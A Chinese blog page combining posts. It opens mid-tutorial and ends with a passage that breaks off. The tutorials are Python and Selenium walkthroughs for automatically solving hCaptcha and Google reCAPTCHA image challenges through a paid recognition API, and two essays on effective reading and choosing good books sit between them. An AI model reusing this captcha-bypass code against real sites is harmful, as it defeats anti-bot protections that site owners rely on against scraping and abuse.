比如这里我们可以 POST 这样的一个内容给服务器，结构如下：

{
    "clientKey": "cc9c18d3e263515c2c072b36a7125eecc078618f",
    "task": {
        "type": "HCaptchaClassification",
        "queries": [
            "/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8Uw...",
            "/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8Uw...",
            ...
            "/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8Uw...",
    ],
        "question": "请单击每个包含卡车的图像。" // 直接上传问题整句
    }
}

然后服务器就会返回类似这样的响应：

{
    "errorId": 0,
    "errorCode": "",
    "status": "ready",
    "solution": {
        "objects": [true, false, false, true, true, false, true, true] // 返回图片是否为目标,
        "labels": ["truck", "boat", "boat", "truck", "truck", "airplane-right", "truck", "truck"] // 返回图片对应的标签
    },
    "taskId": "5aa8be0c-94a5-11ec-80d7-00163f00a53c""
}

OK，我们可以看到，返回结果的 solution 字段中的 objects 字段就包含了一串 true 和 false 的列表，这就代表了每张图片是否和目标匹配。

知道了这个结果之后，我们只需要将返回结果为 true 的图片进行模拟点击就好了。

代码基础实现

行，那有了基本思路之后，那我们就开始用 Python 实现下整个流程吧，这里我们就拿 https://democaptcha.com/demo-form-eng/hcaptcha.html 这个网站作为样例来讲解下整个识别和模拟点击过程。

识别封装

首先我们对上面的任务 API 实现一下封装，来先写一个类：

from loguru import logger
from app.settings import CAPTCHA_RESOLVER_API_KEY, CAPTCHA_RESOLVER_API_URL
import requests


class CaptchaResolver(object):

    def __init__(self, api_url=CAPTCHA_RESOLVER_API_URL, api_key=CAPTCHA_RESOLVER_API_KEY):
        self.api_url = api_url
        self.api_key = api_key

    def create_task(self, queries, question):
        logger.debug(f'start to recognize image for question {question}')
        data = {
            "clientKey": self.api_key,
            "task": {
                "type": "HCaptchaClassification",
                "queries": queries,
                "question": question
            }
        }
        try:
            response = requests.post(self.api_url, json=data)
            result = response.json()
            logger.debug(f'captcha recogize result {result}')
            return result
        except requests.RequestException:
            logger.exception(
                'error occurred while recognizing captcha', exc_info=True)

OK，这里我们就先定义了一个类 CaptchaResolver，然后主要接收两个参数，一个就是 api_url，这个对应的就是 https://api.yescaptcha.com/createTask 这个 API 地址，然后还有一个参数是 api_key，这个就是前文介绍的那个 ClientKey。

接着我们定义了一个 create_task 方法，接收两个参数，第一个参数 queries 就是每张验证码图片对应的 Base64 编码，第二个参数 question 就是要识别的问题整句，这里就是将整个请求用 requests 模拟实现了，最后返回对应的 JSON 内容的响应结果就好了。

基础框架

OK，那么接下来我们来用 Selenium 来模拟打开这个实例网站，然后模拟点选来触发验证码，接着识别验证码就好了。

首先写一个大致框架：

import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.common.action_chains import ActionChains
from app.captcha_resolver import CaptchaResolver


class Solution(object):
    def __init__(self, url):
        self.browser = webdriver.Chrome()
        self.browser.get(url)
        self.wait = WebDriverWait(self.browser, 10)
        self.captcha_resolver = CaptchaResolver()

    def __del__(self):
        time.sleep(10)
        self.browser.close()

这里我们先在构造方法里面初始化了一个 Chrome 浏览器操作对象，然后调用对应的 get 方法打开实例网站，接着声明了一个 WebDriverWait 对象和 CaptchaResolver 对象，以分别应对节点查找和验证码识别操作，留作备用。

iframe 切换支持

接着，下一步我们就该来模拟点击验证码的入口，来触发验证码了对吧。

通过观察我们发现这个验证码和 ReCaptcha 非常类似，其入口其实是在 iframe 里面加载的，对应的 iframe 是这样的：

另外弹出的验证码图片又在另外一个 iframe 里面，如图所示：

Selenium 查找节点是需要切换到对应的 iframe 里面才行的，不然是没法查到对应的节点，也就没法模拟点击什么的了。

所以这里我们定义几个工具方法，分别能够支持切换到入口对应的 iframe 和验证码本身对应的 iframe，代码如下：

def get_captcha_entry_iframe(self) -> WebElement:
    self.browser.switch_to.default_content()
    captcha_entry_iframe = self.browser.find_element_by_css_selector(
        '.h-captcha > iframe')
    return captcha_entry_iframe

def switch_to_captcha_entry_iframe(self) -> None:
    captcha_entry_iframe: WebElement = self.get_captcha_entry_iframe()
    self.browser.switch_to.frame(captcha_entry_iframe)

def get_captcha_content_iframe(self) -> WebElement:
    self.browser.switch_to.default_content()
    captcha_content_iframe = self.browser.find_element_by_xpath(
        '//iframe[contains(@title, "Main content")]')
    return captcha_content_iframe

def switch_to_captcha_content_iframe(self) -> None:
    captcha_content_iframe: WebElement = self.get_captcha_content_iframe()
    self.browser.switch_to.frame(captcha_content_iframe)

这样的话，我们只需要调用 switch_to_captcha_content_iframe 就能查找验证码图片里面的内容，调用 switch_to_captcha_entry_iframe 就能查找验证码入口里面的内容。

触发验证码

OK，那么接下来的一步就是来模拟点击验证码的入口，然后把验证码触发出来了对吧，就是模拟点击这里：

实现很简单，代码如下：

def trigger_captcha(self) -> None:
    self.switch_to_captcha_entry_iframe()
    captcha_entry = self.wait.until(EC.presence_of_element_located(
        (By.CSS_SELECTOR, '#anchor #checkbox')))
    captcha_entry.click()
    time.sleep(2)
    self.switch_to_captcha_content_iframe()
    captcha_element: WebElement = self.get_captcha_element()
    if captcha_element.is_displayed:
        logger.debug('trigged captcha successfully')

这里首先我们首先调用 switch_to_captcha_entry_iframe 进行了 iframe 的切换，然后找到那个入口框对应的节点，然后点击一下。

点击完了之后我们再调用 switch_to_captcha_content_iframe 切换到验证码本身对应的 iframe 里面，查找验证码本身对应的节点是否加载出来了，如果加载出来了，那么就证明触发成功了。

找出识别目标

OK，那么现在验证码可能就长这样子了：

那接下来我们要做的就是两件事了，一件事就是把匹配目标，也就是问题本身找出来，第二件事就是把每张验证码保存下来，然后转成 Base64 编码。

好，那么怎么查找问题呢呢？用 Selenium 常规的节点搜索就好了：

def get_captcha_target_text(self) -> WebElement:
    captcha_target_name_element: WebElement = self.wait.until(EC.presence_of_element_located(
        (By.CSS_SELECTOR, '.prompt-text')))
    return captcha_target_name_element.text

通过调用这个方法，我们就能得到上图中完整的问题文本了。

验证码识别

接下来，我们就需要把每张图片进行下载并转成 Base64 编码了，我们观察下它的 HTML 结构：

我们可以看到，每个验证码其实都对应了一个 .task-image 的节点，然后里面有个 .image-wrapper 的节点，在里面有一个 .image 的节点，那图片怎么呈现的呢？这里它是设置了一个 style CSS 样式，通过 CSS 的 backgroud 来设置了验证码图片的地址。

所以，我们要想提取验证码图片也比较容易了，我们只需要找出 .image 节点的 style 属性的内容，然后提取其中的 url 就好了。

得到 URL 之后，转下 Base64 编码，利用 captcha_resolver 就可以对内容进行识别了。

所以代码可以写为如下内容：

def verify_captcha(self):
    # get target text
    self.captcha_target_text = self.get_captcha_target_text()
    logger.debug(
        f'captcha_target_text {self.captcha_target_text}'
    )
    # extract all images
    single_captcha_elements = self.wait.until(EC.visibility_of_all_elements_located(
        (By.CSS_SELECTOR, '.task-image .image-wrapper .image')))
    resized_single_captcha_base64_strings = []
    for i, single_captcha_element in enumerate(single_captcha_elements):
        single_captcha_element_style = single_captcha_element.get_attribute(
            'style')
        pattern = re.compile('url\("(https.*?)"\)')
        match_result = re.search(pattern, single_captcha_element_style)
        single_captcha_element_url = match_result.group(
            1) if match_result else None
        logger.debug(
            f'single_captcha_element_url {single_captcha_element_url}')
        with open(CAPTCHA_SINGLE_IMAGE_FILE_PATH % (i,), 'wb') as f:
            f.write(requests.get(single_captcha_element_url).content)
        resized_single_captcha_base64_string = resize_base64_image(
            CAPTCHA_SINGLE_IMAGE_FILE_PATH % (i,), (100, 100))
        resized_single_captcha_base64_strings.append(
            resized_single_captcha_base64_string)

    logger.debug(
        f'length of single_captcha_element_urls {len(resized_single_captcha_base64_strings)}')

这里我们提取出来了每张验证码图片的 url，这里是用正则表达式进行批评的，提取出 url 之后，我们然后将其存入了 resized_single_captcha_base64_strings 列表里面。

其中这里的 Base64 编码我们单独定义了一个方法，传入了图片路径和调整大小，然后可以返回编码后的结果，定义如下：

from PIL import Image
import base64
from app.settings import CAPTCHA_RESIZED_IMAGE_FILE_PATH


def resize_base64_image(filename, size):
    width, height = size
    img = Image.open(filename)
    new_img = img.resize((width, height))
    new_img.save(CAPTCHA_RESIZED_IMAGE_FILE_PATH)
    with open(CAPTCHA_RESIZED_IMAGE_FILE_PATH, "rb") as f:
        data = f.read()
        encoded_string = base64.b64encode(data)
        return encoded_string.decode('utf-8')

图片识别

好，那么现在我们已经可以得到问题内容了，也能得到每张图片对应的 Base64 编码了，我们直接利用 YesCaptcha 进行图像识别就好了，代码调用如下：

# try to verify using API
captcha_recognize_result = self.captcha_resolver.create_task(
    resized_single_captcha_base64_strings,
    self.captcha_target_text
)
if not captcha_recognize_result:
    logger.error('count not get captcha recognize result')
    return
recognized_results = captcha_recognize_result.get(
    'solution', {}).get('objects')

if not recognized_results:
    logger.error('count not get captcha recognized indices')
    return

如果运行正常的话，我们可能得到如下的返回结果：

{
  "errorId": 0,
  "errorCode": "",
  "status": "ready",
  "solution": {
    "objects": [true, false, false, false, true, false, true, true, false],
    "labels": [
      "boat",
      "seaplane",
      "bicycle",
      "train",
      "boat",
      "train",
      "boat",
      "boat",
      "bus"
    ]
  },
  "taskId": "25fee484-df63-11ec-b02e-c2654b11608a"
}

现在我们可以看到 sulution 里面的 objects 字段就包含了 true false 的列表，比如第一个 true 就代表了第一个验证码是和问题匹配的，第二个 false 就代表了第二个验证码图片和问题是不匹配的。那序号和图片又是怎么对应的呢？见下图：

从左到右一行行地数，序号依次递增，比如第一行第一个序号就是 0，那么其结果就是 objects 结果里面的第一个结果，true。

模拟点击

现在我们已经得到 true false 列表了，我们只需要将结果是 true 的序号提取出来，然后对这些验证码小图点击就好了，代码如下：

# click captchas
recognized_indices = [i for i, x in enumerate(recognized_results) if x]
logger.debug(f'recognized_indices {recognized_indices}')
click_targets = self.wait.until(EC.visibility_of_all_elements_located(
    (By.CSS_SELECTOR, '.task-image')))
for recognized_index in recognized_indices:
    click_target: WebElement = click_targets[recognized_index]
    click_target.click()
    time.sleep(random())

当然我们也可以通过执行 JavaScript 来对每个节点进行模拟点击，效果是类似的。

这里我们用 for 循环将 true false 列表转成了一个列表，列表的每个元素代表 true 在列表中的位置，其实就是我们的点击目标了。

然后接着我们获取了所有的验证码小图对应的节点，然后依次调用 click 方法进行点击即可。

这样我们就可以实现验证码小图的逐个识别了。

点击验证

好，那么有了上面的逻辑，我们就能完成整个 HCaptcha 的识别和点选了。

最后，我们模拟点击验证按钮就好了：

# after all captcha clicked
verify_button: WebElement = self.get_verify_button()
if verify_button.is_displayed:
    verify_button.click()
    time.sleep(3)

而 verfiy_button 的提取也是用 Selenium 即可：

1
2
3

def get_verify_button(self) -> WebElement:
    verify_button = self.wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, '.button-submit')))
    return verify_button

校验结果

点击完了之后，我们可以尝试检查网页变化，看看有没有验证成功。

比如验证成功的标志就是出现一个绿色小对勾：

检查方法如下：

def get_is_successful(self):
    self.switch_to_captcha_entry_iframe()
    anchor: WebElement = self.wait.until(EC.visibility_of_element_located((
        By.CSS_SELECTOR, '#anchor #checkbox'
    )))
    checked = anchor.get_attribute('aria-checked')
    logger.debug(f'checked {checked}')
    return str(checked) == 'true'

这里我们先切换了 iframe，然后检查了对应的 class 是否是符合期望的。

最后如果 get_is_successful 返回结果是 True，那就代表识别成功了，那就整个完成了。

如果返回结果是 False，我们可以进一步递归调用上述逻辑进行二次识别，直到识别成功即可。

# check if succeed
is_succeed = self.get_is_successful()
if is_succeed:
    logger.debug('verifed successfully')
else:
    self.verify_captcha()

代码

以上代码可能比较复杂，这里我将代码进行了规整，然后放到 GitHub 上了，大家如有需要可以自取：https://github.com/Python3WebSpider/HCaptchaResolver

注册地址

最后需要说明一点，上面的验证码服务是收费的，每验证一次可能花一定的点数，比如识别一次 3x3 的图要花 10 点数，而充值一块钱就能获得 1000 点数，所以识别一次就一分钱，还是比较便宜的。

我这里充值了好几万点数，然后我就变成了 VIP5 级的账号。我研究了下发现大家如果用我的邀请链接 https://yescaptcha.com/i/CnZPBu 注册大家可以直接变成 VIP4，然后 VIP4 可以获取首充赠送 10% 的优惠，还不错哈～

希望本文对大家有帮助。

作者崔庆才发表于 2022-05-30 阅读次数：本文字数： 11k 阅读时长 ≈ 10 分钟

个人记录 怎样才是有效阅读

你有没有过这样的经历：现在自媒体、短视频兴起的时代，我们有时候听到好像两种完全的对立的观点，但我们有时候可能觉得这也对，那也对，但我们就没能力去反驳和佐证某个观点。听风就是雨，觉得自己没有能力去分辨哪些是对的，哪些是错的。我们的大脑好像就像别人观点的跑马场，听到这个观点，脑子中过一遍，好像觉得又道理，又来了一个相反的观点，脑子中过一遍，好像也有道理。但很明显，二者肯定只有一个是对的，那为什么我们就没有能力分辨呢？

这是因为，我们脑中的知识储备还不够，对一个问题的思考还不够深刻。

读书是我们摄入知识的一个重要来源，就拿看书来说吧。

我们人总一种倾向性，那就是在读书的时候倾向于去寻找和自己意见观点相似的内容，从一些书中去寻找认同感。

借用《暗时间》里面的一段话：

我们在阅读的时候会无意识地过滤掉不符合我们既有知识和心智结构的知识，以我们情感所中意的方向对事实和观点进行“再解释”，对不符合我们立场、预期和情感诉求的观点弃之如敝履，对合我们立场、预期和情感诉求的观点则不细究其论证过程。

所以，很多时候，我们看似在看一本书，但多数情况下我们只是从大致层面上理解了我们倾向去接受的一些观点，而去忽略一些和我们想法相悖的观点。

结果是什么？只是道理穿肠过，执念心头坐。已有的概念和道理还是存在于我们的脑海里，没有的概念和道理也不会进入到我们的脑海里，其实这种阅读方式就是一种缺乏深度的阅读，这只不过是一些符号记忆，一种模糊认知，是很有问题的。

那说到这，有人可能就问，那什么才是有效的阅读呢？

有效的阅读是要用心去读的，带着思维去到一篇文本之中，去理解为什么作者就提出了这样的观点，这样的观点是怎样一步步论证出来的，论证过程中所用的依据的可信度高不高等等。其实这个过程有点像读论文了，我们读论文的时候一般就会按照上面的过程来分析，如果我们把这个模式应用到读书上，效果也会是很好的。

在阅读的过程中我们同时还要进行一些反面的思考，比如结论的对立面有没有道理，有没有可能通过类似的方式也能佐证结论的对立面。经过反向思考，我们可以强化整个思考的过程，对已有的正确结论的论证有更清晰的认知。因为一个问题的论证，它也有反证法的对不对？

这种阅读才是一种深度、有效的阅读。

但这里需要强调的是，这里说的深度阅读并不是让我们花费很多时间对一篇文章一句话一句话的扣，这里强调的深度阅读是要在阅读的过程中多去思考，去尝试理解其精髓和思维脉络，去辩证地看待一些观点。有时候有些书看起来很冗长的，举了非常多的例子都为了佐证一个观点，但实际上核心的点可能就那么几段话或甚至几句话，我们能够找出其中的关键思维脉络才是最关键的，而不是说要把每个例子也逐句扣完。

再借用《暗时间》里面的一段话：

在这样的阅读中，一篇文本能够帮助我们纠正我们的知识体系中有问题的结论或预设，可能会为我们已经确立的结论提供更深刻的佐证，可能会帮助我们弥补知识体系中的短板，进一步反思我们的知识体系中那些含糊、广而泛之的结论，也可能会彻底纠正我们之前错误的想法，也可能帮我们打开了一个新的知识分支。

如此的阅读，我们头脑中对的认知才能更加强化，同时也可以对我们错误的认知加以纠正，长此以往，我们的思维会在碰撞中不断成长。

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2022-05-29 阅读次数：本文字数： 1.4k 阅读时长 ≈ 1 分钟

个人记录 看书也要挑剔点

我想多数人应该会对很多事情有所挑剔吧，比如买一件衣服的时候挑挑选选、货比三家最后才定下一件衣服，比如点餐的时候也挑挑选选找出想吃的一家。但有时候大家在看书的时候可能就没有那么“挑剔”，可能心想，这是本书，然后我花时间看书了，好像就可以了，就以为自己学会了，自己用功了，自己进步了，实际上，很多时候可能只是在自己骗自己，寻找一些心里安慰罢了，只是为了临时缓解自己的一些焦虑感罢了，但实际上真正有没有进步，有没有学到东西，要看自己是否真正去用心学了，当然另一方面也取决于书本身的质量好不好。

所以，上面提到了看一本书的关键两个点：

一个是是否用心去看、去思考了。
一个是书本身的质量如何。

今天，我们专门来说说第二点。

选一本好书，其实对我们的时间负责。

我们每个人的时间都是宝贵的，有时候我们随意地找本书烂书来看，说实话还不如不看。去花时间选一本好书，做好选书的功课是非常重要的。有时候决定读一本书之前，稍微花一点点时间去网上看看评价，综合分析一下，就能比较快地知道这本书到底值不值得看。因为有时候读一本书的时候我们可能花很多时间去深入阅读，在深入阅读之前，迅速了解一本书的质量可以帮我们节省很多的时间，甚至说看到某本书质量完全不行，那直接摒弃不看，那就省去了看这本书的时间，对不对？

个人建议，多读那些经典好书。

那么问题来了，怎么知道一本书是好书呢？依我个人而言，主要有这么几个点：

看评价。我们说群众的眼睛是雪亮的，一千个读者会有一千个哈姆雷特。所以，每个人看完书之后都可能会有不同视角的评价。个人建议去豆瓣、亚马逊上先去看看评价是怎样的，比如评分过低两三分的那种直接 pass 就行了。另外除了看评分，也去看看一些文字评价，特别要注意去看看那些低分评价是怎么说的，多数情况下，一些小众的低分评价可能更多来自于一些懂行的人，而一些大众的高分评价很可能是浮于表面的评价或者甚至是刷的。所以，如果我们从一些低分评价里面都找不出来一些实质的反驳观点，那基本上这本书应该是不错的了。
看目录和简介。通常情况下，一本书的目录和简介都是公开的。通过目录我们能够快速地了解到这本书讲了什么内容，是不是符合我们的期望，有没有我们真正想学的内容。通过简介我们可以大致了解这本书的写作初衷，解决了什么痛点，传达给我们什么信息，另外我们还能通过简介大致了解到作者的思维脉络。基本上一本书要有一个清晰有层次的目录和简介，这本书就差不到哪里去。
看作者。这个其实分两种情况了，一种情况是我们知道这个作者，另一种情况是我们不知道这个作者。对于前者，如果他是一个知名作家、教授或者曾经写过一些优秀的作品，那么他的某本书应该差不了。对于后者，我们可以去查阅他的相关简介、履历，尝试了解一些他的其他作品，了解下他人对作者的评价，如果不错的话，那么该作者的作品应该大概率会不错的。
看样章。一些书的网站上通常都会有一些试读章节，我们可以选一些章节来阅读下。比如条理是否清晰、内容是否深刻，其实读上个几页或者两三节我们就知道了。如果样章的内容都让我们感到不知所云，那么整本书应该就不值得读了。

好，那知道了好书的一些评判标准，那从哪里找到一些好书呢？

排行榜：这其实和看电影是类似的了，比如一些豆瓣上的优秀书单，一些高分评价的书，通常都差不了。
朋友推荐：一般来说，一个人能跟我们成为朋友，那他的思维和三观应该不会和我们差太多。那如果朋友觉得还不错的话，我们应该也多数情况下不会觉得很差的。另外，朋友一般在推荐书的时候，可能真的会挑自己印象最深刻的或者近期读到的最值得说的书告诉我们，所以这个信息其实是朋友又帮我们经过了一些筛选得到的，所以多数情况下，一些朋友推荐的书质量应该还都不错。
引用：一本好的书籍或作品，往往在其他多数作品、文章、论文里面会被引用，这个信息我们也值得注意下。比如我最近读了刘未鹏的《暗时间》，他的书里面推荐了几本关于思维的书籍《这才是心理学》、《你的灯亮着吗》、《合作的进化》等书，应该都差不了。
同一作者的著作：我们觉得某本书写得还不错，那么该作者的其他书籍应该也在多数情况下会不错。就像一个歌手出了一首不错的歌，那么其他的一些歌的质量应该也差不了。一样的道理。

好了，今天就唠到这里，总结下，这篇文章主要讲了：

多读那些经典好书，选一本好书，其实对我们的时间负责。
怎样知道一本书是一本好书。
怎样去寻找一本好书。

希望对大家有所启发～

本文部分论点来源：《暗时间》

非常感谢你的阅读，更多精彩内容，请关注我的公众号「进击的 Coder」和「崔庆才丨静觅」。

作者崔庆才发表于 2022-05-28 阅读次数：本文字数： 1.9k 阅读时长 ≈ 2 分钟

爬虫 谷歌验证码 ReCAPTCHA 的模拟点击破解方案来了！

大家好，我是崔庆才。

之前的时候我分享过 ReCAPTCHA 的破解方案，那种方案是获取到 ReCAPTCHA 其中的一个 siteKey，然后将 siteKey 直接提交给 ReCAPTCHA 相关的破解服务来实现破解。

这次，我们再来介绍一种更灵活更强大的全模拟点击破解方案，整体思路就是将全部的验证码图片进行识别，并根据识别结果对 ReCAPTCHA 验证码进行模拟点击，从而最终通过验证码。

ReCAPTCHA 介绍

在开始之前，我这里先简单提下什么是 ReCAPTCHA，可能大家见的不多，因为这个验证码在国内并没有那么普及。

验证码是类似这样子的：

我们这时候需要点击验证码上的小框来触发验证，通常情况下，验证码会呈现如下的点选图：

比如上面这张图，验证码页面会出现九张图片，同时最上方出现文字「树木」，我们需要点选下方九张图中出现「树木」的图片，点选完成之后，可能还会出现几张新的图片，我们需要再次完成点选，最后点击「验证」按钮即可完成验证。

ReCAPTCHA 也有体验地址，大家可以打开 https://www.google.com/recaptcha/api2/demo 查看，打开之后，我们可以发现有如上图所示的内容，然后点选图片进行识别即可。

整体识别思路

其实我们看，这种验证码其实主要就是一些格子的点选，我们只要把一些相应的位置点击对了，最后就能验证通过了。

经过观察我们发现，其实主要是 3x3 和 4x4 方格的验证码，比如 3x3 的就是这样的：

4x4 的就是这样的：

然后验证码上面还有一行加粗的文字，这就是我们要点选的目标。

所以，关键点就来了：

第一就是把上面的文字内容找出来，以便于我们知道要点击的内容是什么。
第二就是我们要知道哪些目标图片和上面的文字是匹配的，找到了依次模拟点击就好了。

听起来似乎很简单的对吧，但第二点是一个难点，我们咋知道哪些图片和文字匹配的呢？这就难搞了。

其实，这个靠深度学习是能做到的，但要搞出这么一个模型是很不容易的，我们需要大量的数据来训练，需要收集很多验证码图片和标注结果，这总的工作量是非常大的。

那怎么办呢？这里给大家介绍一个服务网站 YesCaptcha，这个服务网站已经给我们做好了识别服务，我们只需要把验证码的大图提交上去，然后同时告诉服务需要识别的内容是什么，这个服务就可以返回对应识别结果了。

下面我们来借助 YesCaptcha 来试试识别过程。

YesCaptcha

在使用之前我们需要先注册下这个网站，网站地址是 https://yescaptcha.com/i/CnZPBu，注册个账号之后大家可以在后台获取一个账户密钥，也就是 ClientKey，保存备用。

OK，然后我们可以查看下这里的官方文档：https://yescaptcha.atlassian.net/wiki/spaces/YESCAPTCHA/pages/18055169/ReCaptchaV2Classification+reCaptcha+V2，这里介绍介绍了一个 API，大致内容是这样的。

首先有一个创建任务的 API，API 地址为 https://api.yescaptcha.com/createTask，然后看下请求参数：

这里我们需要传入这么几个参数：

type：内容就是 ReCaptchaV2Classification
image：是验证码对应的 Base64 编码
question：对应的问题 ID，也就是识别目标的代号。

比如这里我们可以 POST 这样的一个内容给服务器，结构如下：

{
  "clientKey": "cc9c18d3e263515c2c072b36a7125eecc078618f",
  "task": {
    "type": "ReCaptchaV2Classification",
    "image": "/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDc....",
    "question": "/m/0k4j"
  }
}

其中这里 image 就可以是一个 3x3 或者 4x4 的验证码截图对应的 Base64 编码的字符串。

然后服务器就会返回类似这样的响应：

{
  "errorId": 0,
  "errorCode": "",
  "errorDescription": "null",
  "status": "ready",
  "taskId": "3a9e8cb8-3871-11ec-9794-94e6f7355a0b",
  "solution": {
    "objects": [1, 5, 8], // 图像需要点击的位置
    "type": "multi"
  }
}

OK，我们可以看到，返回结果的 solution 字段中的 objects 字段就包含了一些代号，比如这里是 1, 5, 8，什么意思呢？这个就是对应的目标点击代号。

对于 3x3 的图片来说，对应的代号就是这样的：

对于 4x4 的图片来说，对应的代号就是这样的：

OK，知道了代号之后，模拟点击就好办多了吧，我们用一些模拟点击操作就可以完成了。

代码基础实现

行，那有了基本思路之后，那我们就开始用 Python 实现下整个流程吧，这里我们就拿 https://www.google.com/recaptcha/api2/demo 这个网站作为样例来讲解下整个识别和模拟点击过程。

识别封装

首先我们对上面的任务 API 实现一下封装，来先写一个类：

from loguru import logger
from app.settings import CAPTCHA_RESOLVER_API_KEY, CAPTCHA_RESOLVER_API_URL
import requests

class CaptchaResolver(object):

    def __init__(self, api_url=CAPTCHA_RESOLVER_API_URL, api_key=CAPTCHA_RESOLVER_API_KEY):
        self.api_url = api_url
        self.api_key = api_key

    def create_task(self, image_base64_string, question_id):
        logger.debug(f'start to recognize image for question {question_id}')
        data = {
            "clientKey": self.api_key,
            "task": {
                "type": "ReCaptchaV2Classification",
                "image": image_base64_string,
                "question": question_id
            }
        }
        try:
            response = requests.post(self.api_url, json=data)
            result = response.json()
            logger.debug(f'captcha recogize result {result}')
            return result
        except requests.RequestException:
            logger.exception(
                'error occurred while recognizing captcha', exc_info=True)

OK，这里我们就先定义了一个类 CaptchaResolver，然后主要接收两个参数，一个就是 api_url，这个对应的就是 https://api.yescaptcha.com/createTask 这个 API 地址，然后还有一个参数是 api_key，这个就是前文介绍的那个 ClientKey。

接着我们定义了一个 create_task 方法，接收两个参数，第一个参数 image_base64_string 就是验证码图片对应的 Base64 编码，第二个参数 question_id 就是要识别的目标是什么，这里就是将整个请求用 requests 模拟实现了，最后返回对应的 JSON 内容的响应结果就好了。

基础框架

OK，那么接下来我们来用 Selenium 来模拟打开这个实例网站，然后模拟点选来触发验证码，接着识别验证码就好了。

首先写一个大致框架：

import time
from selenium import webdriver
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.remote.webelement import WebElement
from selenium.webdriver.common.action_chains import ActionChains
from app.captcha_resolver import CaptchaResolver


class Solution(object):
    def __init__(self, url):
        self.browser = webdriver.Chrome()
        self.browser.get(url)
        self.wait = WebDriverWait(self.browser, 10)
        self.captcha_resolver = CaptchaResolver()

    def __del__(self):
        time.sleep(10)
        self.browser.close()

这里我们先在构造方法里面初始化了一个 Chrome 浏览器操作对象，然后调用对应的 get 方法打开实例网站，接着声明了一个 WebDriverWait 对象和 CaptchaResolver 对象，以分别应对节点查找和验证码识别操作，留作备用。

iframe 切换支持

接着，下一步我们就该来模拟点击验证码的入口，来触发验证码了对吧。

通过观察我们发现这个验证码入口其实是在 iframe 里面加载的，对应的 iframe 是这样的：

另外弹出的验证码图片又在另外一个 iframe 里面，如图所示：

Selenium 查找节点是需要切换到对应的 iframe 里面才行的，不然是没法查到对应的节点，也就没法模拟点击什么的了。

所以这里我们定义几个工具方法，分别能够支持切换到入口对应的 iframe 和验证码本身对应的 iframe，代码如下：

def get_captcha_entry_iframe(self) -> WebElement:
    self.browser.switch_to.default_content()
    captcha_entry_iframe = self.browser.find_element_by_css_selector(
        'iframe[title="reCAPTCHA"]')
    return captcha_entry_iframe

def switch_to_captcha_entry_iframe(self) -> None:
    captcha_entry_iframe: WebElement = self.get_captcha_entry_iframe()
    self.browser.switch_to.frame(captcha_entry_iframe)

def get_captcha_content_iframe(self) -> WebElement:
    self.browser.switch_to.default_content()
    captcha_content_iframe = self.browser.find_element_by_xpath(
        '//iframe[contains(@title, "recaptcha challenge")]')
    return captcha_content_iframe

def switch_to_captcha_content_iframe(self) -> None:
    captcha_content_iframe: WebElement = self.get_captcha_content_iframe()
    self.browser.switch_to.frame(captcha_content_iframe)

这样的话，我们只需要调用 switch_to_captcha_content_iframe 就能查找验证码图片里面的内容，调用 switch_to_captcha_entry_iframe 就能查找验证码入口里面的内容。

触发验证码

OK，那么接下来的一步就是来模拟点击验证码的入口，然后把验证码触发出来了对吧，就是模拟点击这里：

实现很简单，代码如下：

def trigger_captcha(self) -> None:
    self.switch_to_captcha_entry_iframe()
    captcha_entry = self.wait.until(EC.presence_of_element_located(
        (By.ID, 'recaptcha-anchor')))
    captcha_entry.click()
    time.sleep(2)
    self.switch_to_captcha_content_iframe()
    entire_captcha_element: WebElement = self.get_entire_captcha_element()
    if entire_captcha_element.is_displayed:
        logger.debug('trigged captcha successfully')

这里首先我们首先调用 switch_to_captcha_entry_iframe 进行了 iframe 的切换，然后找到那个入口框对应的节点，然后点击一下。

点击完了之后我们再调用 switch_to_captcha_content_iframe 切换到验证码本身对应的 iframe 里面，查找验证码本身对应的节点是否加载出来了，如果加载出来了，那么就证明触发成功了。

找出识别目标

OK，那么现在验证码可能就长这样子了：

那接下来我们要做的就是两件事了，一件事就是把匹配目标找出来，就是上图中的加粗字体，第二件事就是把验证码进行保存，然后转成 Base64 编码，提交给 CaptchaResolver 来识别。

好，那么怎么查找匹配目标呢？也就是上图中的 traffice lights，用 Selenium 常规的节点搜索就好了：

def get_captcha_target_name(self) -> WebElement:
    captcha_target_name_element: WebElement = self.wait.until(EC.presence_of_element_located(
        (By.CSS_SELECTOR, '.rc-imageselect-desc-wrapper strong')))
    return captcha_target_name_element.text

通过调用这个方法，我们就能得到上图中类似 traffic lights 的内容了。

验证码识别

接着，我们对验证码图片进行下载，然后转 Base64 进行识别吧，整体代码如下：

def verify_entire_captcha(self):
    self.entire_captcha_natural_width = self.get_entire_captcha_natural_width()
    logger.debug(
        f'entire_captcha_natural_width {self.entire_captcha_natural_width}'
    )
    self.captcha_target_name = self.get_captcha_target_name()
    logger.debug(
        f'captcha_target_name {self.captcha_target_name}'
    )
    entire_captcha_element: WebElement = self.get_entire_captcha_element()
    entire_captcha_url = entire_captcha_element.find_element_by_css_selector(
        'td img').get_attribute('src')
    logger.debug(f'entire_captcha_url {entire_captcha_url}')
    with open(CAPTCHA_ENTIRE_IMAGE_FILE_PATH, 'wb') as f:
        f.write(requests.get(entire_captcha_url).content)
    logger.debug(
        f'saved entire captcha to {CAPTCHA_ENTIRE_IMAGE_FILE_PATH}')
    resized_entire_captcha_base64_string = resize_base64_image(
        CAPTCHA_ENTIRE_IMAGE_FILE_PATH, (self.entire_captcha_natural_width,
                                         self.entire_captcha_natural_width))
    logger.debug(
        f'resized_entire_captcha_base64_string, {resized_entire_captcha_base64_string[0:100]}...')
    entire_captcha_recognize_result = self.captcha_resolver.create_task(
        resized_entire_captcha_base64_string,
        get_question_id_by_target_name(self.captcha_target_name)
    )

这里我们首先获取了一些验证码的基本信息：

